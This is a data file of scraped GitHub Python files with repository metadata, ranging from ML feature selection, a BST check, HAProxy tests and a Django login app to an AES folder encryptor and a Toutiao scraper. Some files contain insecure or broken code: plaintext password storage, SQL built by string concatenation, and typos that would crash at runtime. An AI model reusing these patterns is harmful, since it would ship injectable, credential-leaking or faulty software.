fs_weight = select_rf(np_data, np_label, cycle)\r\n # get filter sort result\r\n fs_acc = select_test(np_data, np_label, fs_sort, c, g, cv, now_path)\r\n return fs_sort, fs_acc\r\n\r\n\r\n# select rf main for numpy\r\ndef select_np_rf(np_data, np_label, c=8, g=0.125, cv=5, cycle=50, out_path=now_path, in_path=None, raaBook='minCODE'):\r\n if out_path != None:\r\n if os.path.split(out_path)[1] not in os.listdir(os.path.split(out_path)[0]):\r\n os.makedirs(out_path)\r\n # rf\r\n fs_sort, fs_weight = select_rf(np_data, np_label, cycle)\r\n # get filter sort result\r\n fs_acc = select_test(np_data, np_label, fs_sort, c, g, cv, now_path)\r\n # plot\r\n if in_path != None:\r\n iplot.plot_select(fs_sort, fs_acc, os.path.join(out_path, 'Fsort-rf.png'), in_path=in_path)\r\n # plot 2\r\n iplot.plot_feature_analize(fs_sort, fs_acc, fs_weight, os.path.join(out_path, 'Pie-rf.html'), in_path, raaBook=raaBook)\r\n else:\r\n iplot.plot_select(fs_sort, fs_acc, os.path.join(out_path, 'Fsort-rf.png'))\r\n select_save(os.path.join(out_path, 'Fsort-rf.txt'), fs_sort)\r\n return fs_acc.index(max(fs_acc))\r\n else:\r\n # rf\r\n fs_sort, fs_weight = select_rf(np_data, np_label, cycle)\r\n # get filter sort result\r\n fs_acc = select_test(np_data, np_label, fs_sort, c, g, cv, now_path)\r\n return fs_sort, fs_acc\r\n","repo_name":"KingoftheNight/IRAP","sub_path":"irap/Select.py","file_name":"Select.py","file_ext":"py","file_size_in_byte":11436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10781040484","text":"import sys\n\nclass Solution:\n def isValidBSTRecursive(self, node: TreeNode, min, max): # Recursive Approach\n if min >= node.val or max <= node.val:\n return False\n\n return self.isValidBST(node.left, min, node.val) and self.isValidBST(nodr.right, node.val, max)\n\n def isValidBSTBFS(self, root): # Iterative Approach\n max = sys.maxsize\n min = -sys.maxsize - 1\n queue = [AugmentedTreeNode(root, min, max)]\n while queue:\n augmented_node = queue.pop()\n if augmented_node:\n node_value = augmented_node.node.val\n if node_value <= augmented_node.min or node_value >= augmented_node.max:\n return False\n\n queue.append(AugmentedTreeNode(augmented_node.left, augmented_node.min, node_value))\n queue.append(AugmentedTreeNode(augmented_node.left, node_value, augmented_node.max))\n return True\n\n# Ques. Why BFS why not DFS.\n# Ans. BFS will be able to catch the error more faster --> Asymptotically faster\n\n def isValidBST(self, root: TreeNode):\n # Recursive Approach\n # max = sys.maxsize\n # min = -sys.maxsize - 1\n # return self.isValidBSTRecursive(root, min, max)\n\n # Iterative Approach\n return self.isValidBSTBFS(root)\n\nclass AugmentedTreeNode:\n def __init__(self, node, min, max):\n self.node = node\n self.min = min\n self.max = max\n\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left = None # Points to another TreeNode object\n self.right = None # Points to another TreeNode object\n","repo_name":"sandeepyadav10011995/Data-Structures","sub_path":"Binary Tree/Test A Tree For The BST Property.py","file_name":"Test A Tree For The BST Property.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34721650436","text":"def win(s: int, m: int) -> bool:\n \"\"\"Определяет наличие стратегии при заданном количестве камней и номере хода\n\n Args:\n s (int): количество камней\n m (int): номер хода (Нечетные - Петя, Четные - Ваня)\n\n Returns:\n bool: есть или нет стратегии\n \"\"\"\n if 45 <= s <= 112:\n return m % 2 == 0\n if s > 112:\n return m % 2 != 0\n if m == 0:\n return 0\n next_win = [win(s+2, m-1), win(s*3, m-1)]\n return any(next_win) if (m-1) % 2 == 0 else all(next_win)\n\n\nprint(f'19) {[s for s in range(1, 45) if win(s, 2)]}') \nprint(f'20) {[s for s in range(1, 45) if not win(s, 1) and win(s, 3)]}')\nprint(f'21) {[s for s in range(1, 45) if not win(s, 2) and win(s, 4)]}')","repo_name":"niknibud-student/ege","sub_path":"stream_2023/1921_3082.py","file_name":"1921_3082.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41105647118","text":"#!/usr/bin/python3\n\nif __name__ == \"__main__\":\n \"\"\"Print all names defined by hidden_4 module.\"\"\"\n import my_module\n\n my_names = dir(my_module)\n for my_name in my_names:\n if my_name[:2] != \"__\":\n print(my_name)\n","repo_name":"Queenbaloyi/alx-higher_level_programming","sub_path":"0x02-python-import_modules/4-hidden_discovery.py","file_name":"4-hidden_discovery.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28716798223","text":"import time\n\nclass CalculatorBuget:\n def __init__(self):\n self.venituri = 0\n self.cheltuieli = 0\n self.sold = 0\n\n def adauga_venit(self, suma):\n self.venituri += suma\n self.sold += suma\n\n def adauga_cheltuiala(self, suma):\n self.cheltuieli += suma\n self.sold -= suma\n\n def afiseaza_sold(self):\n print(f\"Soldul curent este: {self.sold}\")\n\n def sfaturi_economisire(self):\n if self.venituri > self.cheltuieli:\n economisire_recomandata = (self.venituri - self.cheltuieli) * 0.2\n print(f\"Recomandarea pentru economisire: Economisiți cel puțin 20% din soldul total, adica {economisire_recomandata:.2f}\")\n else:\n print(\"Recomandarea pentru economisire: Încercați să economisiți mai mult pentru a vă echilibra bugetul.\")\n\n\ncalculator = CalculatorBuget()\n\nwhile True:\n print(\"\\n1. Adaugă venit\")\n print(\"2. Adaugă cheltuială\")\n print(\"3. Afisează sold\")\n print(\"4. Sfaturi de economisire\")\n print(\"5. Ieși din aplicație\")\n\n optiune = input(\"Alege o opțiune: \")\n\n if optiune == \"1\":\n suma_venit = float(input(\"Introduceți suma venitului: \"))\n calculator.adauga_venit(suma_venit)\n print(\"Venit adăugat cu succes!\")\n time.sleep(3)\n elif optiune == \"2\":\n suma_cheltuiala = float(input(\"Introduceți suma cheltuielii: \"))\n calculator.adauga_cheltuiala(suma_cheltuiala)\n print(\"Cheltuială adăugată cu succes!\")\n time.sleep(3)\n elif optiune == \"3\":\n calculator.afiseaza_sold()\n time.sleep(3)\n elif optiune == \"4\":\n calculator.sfaturi_economisire()\n time.sleep(3)\n elif optiune == \"5\":\n print(\"Aplicația a fost închisă.\")\n break\n else:\n print(\"Opțiune invalidă. Vă rugăm să introduceți o opțiune validă.\")\n time.sleep(3)\n","repo_name":"MicuSebastianCristian/Small-Useful-Projects","sub_path":"2. Calculator Buget si Sfaturi Financiare/Calculator_buget_si_sfaturi_financiare.py","file_name":"Calculator_buget_si_sfaturi_financiare.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10630228150","text":"# pylint: disable=locally-disabled, too-few-public-methods, no-self-use, invalid-name, broad-except\n\"\"\"test_conn.py - Unittests related to connections to HAProxy.\"\"\"\nimport sys, os\nsys.path.append(os.path.join(os.path.dirname(__file__), '..', '..'))\nfrom haproxy import conn\nimport unittest\nfrom socket import AF_INET, AF_UNIX\n\nclass SimpleConnMock(object):\n \"\"\"Simple socket mock.\"\"\"\n def __init__(self, stype, stream):\n self.stype = stype\n self.stream = stream\n\n def connect(self, addr):\n \"\"\"Mocked socket.connect method.\"\"\"\n pass\n\nclass TestConnection(unittest.TestCase):\n \"\"\"Tests different aspects of haproxyctl's connections to HAProxy.\"\"\"\n\n def testConnSimple(self):\n \"\"\"Tests that connection to non-protocol path works and fallsback to UNIX socket.\"\"\"\n sfile = \"/some/path/to/socket.sock\"\n c = conn.HaPConn(sfile, socket_module=SimpleConnMock)\n addr, stype = c.sfile\n self.assertEqual(sfile, addr)\n self.assertEqual(stype, AF_UNIX)\n\n def testConnUnixString(self):\n \"\"\"Tests that unix:// protocol works and connects to a socket.\"\"\"\n sfile = \"unix:///some/path/to/socket.socket\"\n c = conn.HaPConn(sfile, socket_module=SimpleConnMock)\n addr, stype = c.sfile\n self.assertEqual(\"/some/path/to/socket.socket\", addr)\n self.assertEqual(stype, AF_UNIX)\n\n def testConnTCPString(self):\n \"\"\"Tests that tcp:// protocol works and connects to an IP.\"\"\"\n sfile = \"tcp://1.2.3.4:8080\"\n c = conn.HaPConn(sfile, socket_module=SimpleConnMock)\n addr, stype = c.sfile\n ip, port = addr\n self.assertEqual(\"1.2.3.4\", ip)\n self.assertEqual(8080, port)\n self.assertEqual(stype, AF_INET)\n\n def testConnTCPStringNoPort(self):\n \"\"\"Tests that passing a tcp:// address with no port, raises an Exception.\"\"\"\n sfile = \"tcp://1.2.3.4\"\n # Not using assertRaises because we still support 2.6\n try:\n conn.HaPConn(sfile, socket_module=SimpleConnMock)\n raise Exception('Connection should have thrown an exception')\n except conn.HapError:\n pass\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"opnsense/plugins","sub_path":"net/haproxy/src/opnsense/scripts/OPNsense/HAProxy/lib/haproxy/tests/test_conn.py","file_name":"test_conn.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","stars":762,"dataset":"github-code","pt":"72"} +{"seq_id":"16979620760","text":"import pytest\nimport pandas as pd\n\nfrom pipelitools.preprocessing import features as f\nfrom sklearn.datasets import make_classification\n\n# indices_dict = {\n# \"dataframe\": pd.DataFrame(data={'a': [1, 2, 32, 4],\n# 'dates': ['21.04.2021', '31.05.2020', '01.07.2021', '30.01.2000'],\n# 'values': [564, 698, 2, 415],\n# 'values2': [1,3,9,2]})\n# }\n#\n#\n# @pytest.fixture(params=indices_dict.keys())\n# def df(request):\n# \"\"\"\n# Fixture for dataframes.\n# \"\"\"\n# return indices_dict[request.param].copy()\n\n\n@pytest.fixture(scope=\"function\")\ndef df_binary():\n X_train, y_train = make_classification(n_samples=100, n_features=50, n_informative=2,\n n_redundant=0, n_repeated=0, n_classes=2, n_clusters_per_class=1,\n class_sep=2, flip_y=0, weights=[0.5, 0.5], random_state=1)\n X_test, y_test = make_classification(n_samples=50, n_features=50, n_informative=2,\n n_redundant=0, n_repeated=0, n_classes=2, n_clusters_per_class=1,\n class_sep=2, flip_y=0, weights=[0.5, 0.5], random_state=2)\n y_train = pd.Series(y_train)\n y_test = pd.Series(y_test)\n return X_train, y_train, X_test, y_test\n\n\ndef test_low_variance(df_binary):\n X_train, y_train, X_test, y_test = df_binary\n df = pd.DataFrame(X_train)\n df['y'] = y_train\n cls = f.FeatureSelectionPipeline(df)\n\n\ndef test_RFE_selection(df_binary):\n X_train, y_train, X_test, y_test = df_binary\n df = pd.DataFrame(X_train)\n df['y'] = y_train\n cls = f.FeatureSelectionPipeline(df)\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"nastiag67/pipelitools","sub_path":"tests/preprocessing/test_features.py","file_name":"test_features.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"72420462633","text":"import os\nimport pygame.freetype\npygame.freetype.init()\nFPS = 60\n\nBUTTON_COOLDOWN_EVENT = pygame.USEREVENT + 1\nFont = pygame.freetype.Font(os.path.join(\"Fonts\", \"beastboss_font.ttf\"))\n\nALLOWED_KEYS = [pygame.K_0, pygame.K_1, pygame.K_2, pygame.K_3, pygame.K_4, pygame.K_5, pygame.K_6, pygame.K_7, pygame.K_8, pygame.K_9, pygame.K_BACKSPACE]\n\nclass App:\n WIDTH, HEIGHT = 1280, 720\n WINDOW = pygame.display.set_mode((WIDTH, HEIGHT), pygame.RESIZABLE)\n DARK_MODE = False\n BACKGROUND = (255, 255, 255)\n FOREGROUND = (0, 0, 0)\n SELECTED_FILE = \"\"\n QUANTITY = \"1\"\n BUTTONS_ENABLED = True\n LEFT_MOUSE_RELEASED = False\n SELECTED_PRINTER = None\n FILE_HANDLER = None\n PRINTER_HANDLER = None\n","repo_name":"RealTheBeastBoss/PrintApp","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20340052326","text":"import requests\nimport json\nimport csv\nimport time\nimport random\nimport execjs\n\nf = open(r\"sign.js\", 'r', encoding='UTF-8')\nline = f.readline()\nhtmlstr = ''\nwhile line:\n htmlstr = htmlstr + line\n line = f.readline()\nctx = execjs.compile(htmlstr)\n\ndef saveContent(data,fileName):\n for d in data:\n title = d[\"title\"]\n comment_count = d[\"comments_count\"]\n create_time = d[\"behot_time\"]\n play_effective_count = str(d[\"detail_play_effective_count\"])\n source_url = \"https://www.toutiao.com\"+str(d[\"source_url\"])\n file = open(fileName+\".csv\", \"a\", encoding=\"utf-8\", newline='')\n writer = csv.writer(file)\n writer.writerow([title, play_effective_count, comment_count, time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(create_time)), source_url])\n file.close()\n\ndef getHeader(uid,cookie,path):\n header = {\n \"accept\": \"application/json, text/javascript\",\n \"accept-encoding\": \"gzip, deflate, br\",\n \"accept-language\": \"zh-CN,zh;q=0.9,en;q=0.8\",\n \"content-type\": \"application/x-www-form-urlencoded\",\n \"cookie\": cookie,\n \"referer\": \"https://www.toutiao.com/c/user/%s/\" %(uid),\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; rv:11.0) like Gecko\",\n \"x-requested-with\": \"XMLHttpRequest\",\n }\n return header\n\ndef getUrl(uid, max_behot_time):\n Honey = json.loads(ctx.call('get_as_cp_signature', uid, max_behot_time))\n a = Honey['as']\n c = Honey['cp']\n signature = Honey['_signature']\n url = \"https://www.toutiao.com/c/user/article/?page_type=0&user_id=%s&max_behot_time=%s&count=20&as=%s&cp=%s&_signature=%s\" %(uid,max_behot_time,a,c,signature)\n return url\n\n\ndef mainProcess(name, uid ,mid):\n print(\"开始爬取:\", name)\n file = open(name+\".csv\", \"w\", encoding=\"utf-8\",newline='')\n writer = csv.writer(file)\n writer.writerow([\"标题\", \"播放量\", \"评论数\", \"发布时间\", \"播放地址\"])\n file.close()\n max_behot_time = 0\n cookie = \"\"\n old_max_behot_time = 0\n while(True):\n url = getUrl(uid, max_behot_time)\n path = url[23:]\n response = requests.get(url, headers=getHeader(uid, cookie, path))\n content = response.text\n try:\n cookie = response.headers[\"set-cookie\"]\n cookie = str(cookie).split(\";\")[0]\n except:\n cookie = cookie\n result = json.loads(content)\n time.sleep(random.randint(0,3))\n try:\n nextValue = result[\"next\"]\n max_behot_time = nextValue[\"max_behot_time\"]\n if old_max_behot_time == max_behot_time:\n break\n data = result[\"data\"]\n saveContent(data, name)\n old_max_behot_time = max_behot_time\n except:\n continue\n return 0\n\n\nidFile = open(\"id.txt\", \"r\", encoding=\"utf-8\")\n\nfor id in idFile.readlines():\n finish = open(\"finish.txt\", \"r\", encoding=\"utf-8\")\n s = set()\n for line in finish.readlines():\n if line.isspace() or len(line) == 0:\n continue\n line = line[:len(line)-1]\n line = line.split(\" \")\n s.add(line[1])\n finish.close()\n finish = open(\"finish.txt\", \"a\", encoding=\"utf-8\")\n id.replace(\"\\n\",\"\")\n ids = id.split(\" \")\n if ids[1] not in s:\n result = mainProcess(ids[0], ids[1],ids[2].replace(\"\\n\",\"\"))\n if result==0:\n finish.write(id+\"\\n\")\n finish.close()\nprint(\"success\")","repo_name":"WhiteBugs/toutiao_crawl","sub_path":"crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":3559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38142813869","text":"import frappe\nfrom frappe.custom.doctype.custom_field.custom_field import create_custom_fields\n\n\ndef execute():\n\tfrappe.reload_doc(\"buying\", \"doctype\", \"supplier\", force=True)\n\tfrappe.reload_doc(\"selling\", \"doctype\", \"customer\", force=True)\n\tfrappe.reload_doc(\"core\", \"doctype\", \"doctype\", force=True)\n\n\tcustom_fields = {\n\t\t\"Supplier\": [\n\t\t\t{\"fieldname\": \"pan\", \"label\": \"PAN\", \"fieldtype\": \"Data\", \"insert_after\": \"supplier_type\"}\n\t\t],\n\t\t\"Customer\": [\n\t\t\t{\"fieldname\": \"pan\", \"label\": \"PAN\", \"fieldtype\": \"Data\", \"insert_after\": \"customer_type\"}\n\t\t],\n\t}\n\n\tcreate_custom_fields(custom_fields, update=True)\n","repo_name":"RafMo20D/erpnext-ksa-op","sub_path":"erpnext/patches/v13_0/create_pan_field_for_india.py","file_name":"create_pan_field_for_india.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"23024532450","text":"# Bokeh code I can use later\nfrom bokeh.plotting import figure, output_file, show\nfrom bokeh.io import output_notebook\n\noutput_notebook()\n\nbtc = ''\neth = ''\n\np1 = figure(x_axis_type = 'datetime', title = 'Crypto Prices', width = 800)\np1.grid.grid_line_alpha = 0.3\np1.xaxis.axis_label = 'Date'\np1.yaxis.axis_label = 'Price'\n\np1.line(btc.index, btc['ClosePrice'], color = '#f2a980', legend = 'Bitcoin')\np1.line(btc.index, eth['ClosePrice'], color = '#f2a980', legend = 'Ether')\n\np1.legend.location = 'top_left'\nshow(p1)\n","repo_name":"joe-jngigi/lux_data_engineering","sub_path":"practise_tutor/bokeh.py","file_name":"bokeh.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11134686633","text":"import math\nimport fastPow\nimport miller_robin\n\n\ndef power(N):\n def isPower(l, r, s, N):\n if (l > r):\n return -1\n mid = (l + r) / 2\n ans = fastPow.fastPowBool(mid, s, N)\n if (ans == N):\n return mid\n elif (ans < N):\n return isPower(mid+1, r, s, N)\n else:\n return isPower(l, mid-1, s, N)\n\n s = int(math.floor(math.log(N, 2))) + 1\n r = int(math.floor(math.sqrt(N))) + 1\n for i in range(2, s):\n ans = isPower(2, r, i, N)\n if ans != -1:\n return ans\n return -1\n","repo_name":"Michaelvll/myQShor","sub_path":"Classical/power.py","file_name":"power.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"72"} +{"seq_id":"37895818065","text":"#!/usr/bin/env python\n\n# test of first-generation TDI X noise with the baseline configuration,\n# and with a bad proof-mass noise\n\n# this script demonstrates the generation of a TDI X time series with\n# custom noise objects, and in particular:\n# - creating a LISA geometry object\n# - creating a TDInoise object based on standard pseudorandom noises\n# - creating a TDInoise object based on custom spectral density values\n# for the noises\n# - calling getobs to get an array of X values at equispaced times\n# - getting the spectrum of the time series and writing it to disk\n\n# import all the libraries that are needed\n\nfrom synthlisa import *\nimport numpy\n\n# we create a LISA geometry object corresponding to a stationary LISA\n# with equal armlengths\n\noriginallisa = OriginalLISA(16.6782,16.6782,16.6782)\n\n# create a TDInoise object with standard pseudorandom noises\n\nstime = 4.0\n\noriginalnoise = TDInoise(originallisa,\n stime, 2.5e-48, # all six proof masses get this\n stime, 1.8e-37, # all six optical-path noises get this\n stime, 1.1e-26) # all six laser noises get this\n\n# create a TDInoise object with custom parameters for the eighteen\n# here pm_1 (unstarred) is a hundred times worse, in power\n\nbadnoise = TDInoise(originallisa,\n [PowerLawNoise(stime,256.0,2.5e-46,-2.0,1)] + [PowerLawNoise(stime,256.0,2.5e-48,-2.0,1) for i in range(5)],\n [PowerLawNoise(stime,256.0,1.8e-37,2.0,1) for i in range(6)],\n [PowerLawNoise(stime,256.0,1.1e-26,0.0,1) for i in range(6)])\n\n# get the time series; since they're from different TDInoise objects,\n# there's no point in doing them together\n\nsamples = 2**19 # 2**18 takes 22 s on a 1.25GHz G4\n\npatches = 1024\n\nnoisegood = getobsc(samples,stime,originalnoise.Xm)\n\n[noisebad,noisebad2,noisebad3] = numpy.transpose(getobsc(samples,stime,[badnoise.Xm,badnoise.Ym,badnoise.Zm]))\n\n# compute spectra, and write to disk\n\nmyspecgood = spect(noisegood,stime,patches)\nwritearray('data/tdibadmass-good.txt',myspecgood[1:])\n\nmyspecbad = spect(noisebad,stime,patches)\nwritearray('data/tdibadmass-bad.txt', myspecbad[1:])\n\nmyspecbad2 = spect(noisebad2,stime,patches)\nwritearray('data/tdibadmass-bad2.txt',myspecbad2[1:])\n\nmyspecbad3 = spect(noisebad3,stime,patches)\nwritearray('data/tdibadmass-bad3.txt',myspecbad3[1:])\n","repo_name":"vallis/synthlisa","sub_path":"examples/manual-examples/test-tdibadmass.py","file_name":"test-tdibadmass.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"72"} +{"seq_id":"25531265439","text":"from django.shortcuts import render\nfrom . import form\n# Create your views here.\nfrom login import models\nfrom django.shortcuts import redirect\n\n# Create your views here.\nfrom .models import Group\n\n\ndef index(request):\n test_class = models.CreateClass.objects.all()\n context = {'create_class': test_class}\n return render(request, 'index.html', context)\n\n\ndef login(request):\n if request.session.get('is_login', None): # 不允许重复登录\n return redirect('index')\n if request.method == 'POST':\n login_form = form.UserForm(request.POST)\n message = '請檢查內容!'\n if login_form.is_valid():\n username = login_form.cleaned_data.get('username')\n password = login_form.cleaned_data.get('password')\n identify = login_form.cleaned_data.get('identify')\n try:\n user = models.User.objects.get(name=username)\n except :\n message = '用戶不存在!'\n return render(request, 'login_base.html', locals())\n\n if user.password == password:\n request.session['is_login'] = True\n request.session['user_id'] = user.id\n request.session['user_name'] = user.name\n request.session['user_identify'] = user.identify\n return redirect('index')\n else:\n message = '密碼不正確!'\n return render(request, 'login_base.html', locals())\n else:\n return render(request, 'login_base.html', locals())\n\n login_form = form.UserForm()\n return render(request, 'login_base.html', locals())\n\n\ndef register(request):\n if request.session.get('is_login', None):\n return redirect('/index/')\n\n if request.method == 'POST':\n register_form = form.RegisterForm(request.POST)\n message = \"請檢查填寫內容!\"\n if register_form.is_valid():\n username = register_form.cleaned_data.get('username')\n password1 = register_form.cleaned_data.get('password1')\n password2 = register_form.cleaned_data.get('password2')\n email = register_form.cleaned_data.get('email')\n sex = register_form.cleaned_data.get('sex')\n identify = register_form.cleaned_data.get('identify')\n if password1 != password2:\n message = '两次输入的密码不同!'\n return render(request, 'register_base.html', locals())\n else:\n same_name_user = models.User.objects.filter(name=username)\n if same_name_user:\n message = '用户名已经存在'\n return render(request, 'register_base.html', locals())\n same_email_user = models.User.objects.filter(email=email)\n if same_email_user:\n message = 'email已存在!'\n return render(request, 'register_base.html', locals())\n\n new_user = models.User()\n new_user.name = username\n new_user.password = password1\n new_user.email = email\n new_user.sex = sex\n new_user.identify = identify\n new_user.save()\n\n return redirect('login')\n else:\n return render(request, 'register_base.html', locals())\n register_form = form.RegisterForm()\n return render(request, 'register_base.html', locals())\n\n\ndef logout(request):\n if not request.session.get('is_login', None):\n return redirect('index')\n request.session.flush()\n # 或者使用下面的方法\n # del request.session['is_login']\n # del request.session['user_id']\n # del request.session['user_name']\n return redirect(\"index\")\n\n\ndef create_class(request):\n # if request.session['user_identify'] == 'teacher':\n if request.method == 'POST':\n class_form = form.ClassForm(request.POST)\n if class_form.is_valid():\n class_form.save()\n return redirect('index')\n else:\n class_form = form.ClassForm()\n context = {\n 'class_form': class_form,\n }\n return render(request, 'create_class.html', context)\n\n\ndef create_activate(request):\n class_c = models.CreateClass.objects.all()\n if request.method == 'POST':\n activate = form.ActivateForm(request.POST)\n if activate.is_valid():\n activate.save()\n return redirect('index')\n else:\n activate = form.ActivateForm()\n context = {\n 'class_c': class_c,\n 'activate': activate,\n }\n return render(request, 'create_activate.html', context)\n\n\ndef view_activate(request, pk):\n activte_a = models.CreateActivate.objects.filter(class_id=pk)\n context = {\n 'activate_a': activte_a,\n 'pk': pk\n }\n return render(request, 'view_activate.html', context)\n\n\ndef view_group(request, pk):\n activate_a = models.CreateActivate.objects.filter(id=pk)\n group_a = models.Group.objects.all()\n context = {\n 'activate_a': activate_a,\n 'group_a': group_a,\n 'pk': pk\n }\n return render(request, 'view_group.html', context)\n\n\ndef create_group(request, pk):\n activate_a = models.CreateActivate.objects.filter(id=pk)\n user_a = models.User.objects.all()\n if request.method == 'POST':\n group = form.CreateGroup(request.POST)\n tests = request.POST.getlist('check_box_list')\n if group.is_valid():\n obj : Group()\n obj = group.save()\n for t in tests:\n obj.group_user.add(t)\n obj.save()\n return redirect('index')\n else:\n group = form.CreateGroup()\n context = {\n 'user_a': user_a,\n 'activate_a': activate_a,\n 'group': group\n }\n return render(request, 'create_group.html', context)\n","repo_name":"s9011810/testpbl","sub_path":"pbl/login/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15930542456","text":"import os\nimport hashlib\nfrom Crypto.Cipher import AES\nfrom Crypto.Util import Padding\n\ndef encrypt_file(key, in_filename, out_filename=None, chunksize=64*1024):\n if not out_filename:\n out_filename = in_filename + '.enc'\n iv = os.urandom(16)\n encryptor = AES.new(key, AES.MODE_CBC, iv)\n filesize = os.path.getsize(in_filename)\n with open(in_filename, 'rb') as infile:\n with open(out_filename, 'wb') as outfile:\n outfile.write(filesize.to_bytes(8, 'big'))\n outfile.write(iv)\n while True:\n chunk = infile.read(chunksize)\n if len(chunk) == 0:\n break\n chunk = Padding.pad(chunk, AES.block_size, style='pkcs7')\n outfile.write(encryptor.encrypt(chunk))\n\ndef decrypt_file(key, in_filename, out_filename=None, chunksize=64*1024):\n if not out_filename:\n out_filename = os.path.splitext(in_filename)[0]\n with open(in_filename, 'rb') as infile:\n original_size = int.from_bytes(infile.read(8), 'big')\n iv = infile.read(16)\n decryptor = AES.new(key, AES.MODE_CBC, iv)\n with open(out_filename, 'wb') as outfile:\n while True:\n chunk = infile.read(chunksize)\n if len(chunk) == 0:\n break\n outfile.write(decryptor.decrypt(chunk))\n outfile.truncate(original_size)\n\ndef encrypt_folder(key, in_folder, out_folder=None):\n if not out_folder:\n out_folder = in_folder + '.enc'\n if not os.path.exists(out_folder):\n os.makedirs(out_folder)\n for root, dirs, files in os.walk(in_folder):\n for dir in dirs:\n encrypt_folder(key, os.path.join(root, dir), os.path.join(out_folder, dir))\n for file in files:\n encrypt_file(key, os.path.join(root, file), os.path.join(out_folder, file))\n\ndef decrypt_folder(key, in_folder, out_folder=None):\n if not out_folder:\n out_folder = os.path.splitext(in_folder)[0]\n if not os.path.exists(out_folder):\n os.makedirs(out_folder)\n for root, dirs, files in os.walk(in_folder):\n for dir in dirs:\n decrypt_folder(key, os.path.join(root, dir), os.path.join(out_folder, dir))\n for file in files:\n decrypt_file(key, os.path.join(root, file), os.path.join(out_folder, file))\n \n if name == 'main':\n key = hashlib.sha256('secret_key'.encode()).digest()\n in_folder = 'example_folder'\n out_folder = 'encrypted_folder'\n encrypt_folder(key, in_folder, out_folder)\n decrypt_folder(key, out_folder)","repo_name":"Danchivskyi/Cybersecurity-tasks","sub_path":"Folder-and-file-Encryption.py","file_name":"Folder-and-file-Encryption.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28715891699","text":"#!/usr/bin/python3\n\"\"\"Contacts\n\nManage contacts from the database\n\"\"\"\nimport logging\nfrom docopt import docopt\nimport sqlite3\nfrom src.app_user import *\n# Not necessarily useful\n\n\nclass contacts:\n \"\"\" Contacts classes to manage the database from the client\n \"\"\"\n\n DB_NAME = \"contacts.db\"\n USERNAME_COL_NAME = 'name'\n COLUMN_NAMES = (USERNAME_COL_NAME,\"password\",\"pubkey\",\"ip\")\n\n conn = None\n def __init__(self,db_path,usr):\n if db_path == \"\" or usr == None:\n raise ValueError\n \n try :\n self.conn = sqlite3.connect(db_path)\n except ConnectionError:\n raise \n self.cur = self.conn.cursor()\n query = \"create table if not exists \"+usr.name+\" (\"+ contacts.COLUMN_NAMES[0] + \" UNIQUE\"\n for col in contacts.COLUMN_NAMES[1:] :\n query += \", \" + col \n query += ');'\n self.cur.execute(query)\n self.owner = usr\n\n def add_user(self,usr) :\n \"\"\"Insert an app_user into the database\n Args:\n\t\tusr_name (usr) : an app_user \n\t\t\n\t\"\"\" \n query = \"INSERT INTO \"+ self.owner.name + \"(\" +contacts.COLUMN_NAMES[0]\n var_field = \"(?\"\n for col in contacts.COLUMN_NAMES[1:] :\n query += \" , \" + col \n var_field += \",?\"\n\n query += \") values \" + var_field +\")\"\n \n self.cur.execute(query,(usr.name,usr.password,usr.pubkey,usr.ip))\n self.conn.commit()\n\n def get_user(self,usr_name) :\n \"\"\" Return an app_user from the database\n\t\tArgs:\n\t\tusr_name (String) : the name of the user we want to retrieve\n\t\t\n\t\tReturns:\n appUser: the user retrieved from the database\n\t\"\"\" \n query = \"SELECT * FROM \"+self.owner.name+\" WHERE \"+USERNAME_COL_NAME + \" = '\" +usr_name +\"'\"\n fields = self.cur.execute(query).fetchall()\n print(fields[0])\n return app_user(fields[0][0],fields[0][1],fields[0][2],fields[0][3])\n\n def get_users(self) :\n \"\"\" Return all the app users from the database\n\n\t\tReturns:\n appUser[]: the users retrieved from the database\n\t\"\"\" \n query = \"SELECT * FROM \"+self.owner.name\n fields = self.cur.execute(query).fetchall()\n users = []\n for usr_info in fields :\n users.append(app_user(usr_info[0],usr_info[1],usr_info[2],usr_info[3]))\n\n return users\n\n\nif __name__ == \"__main__\" :\n Contacts 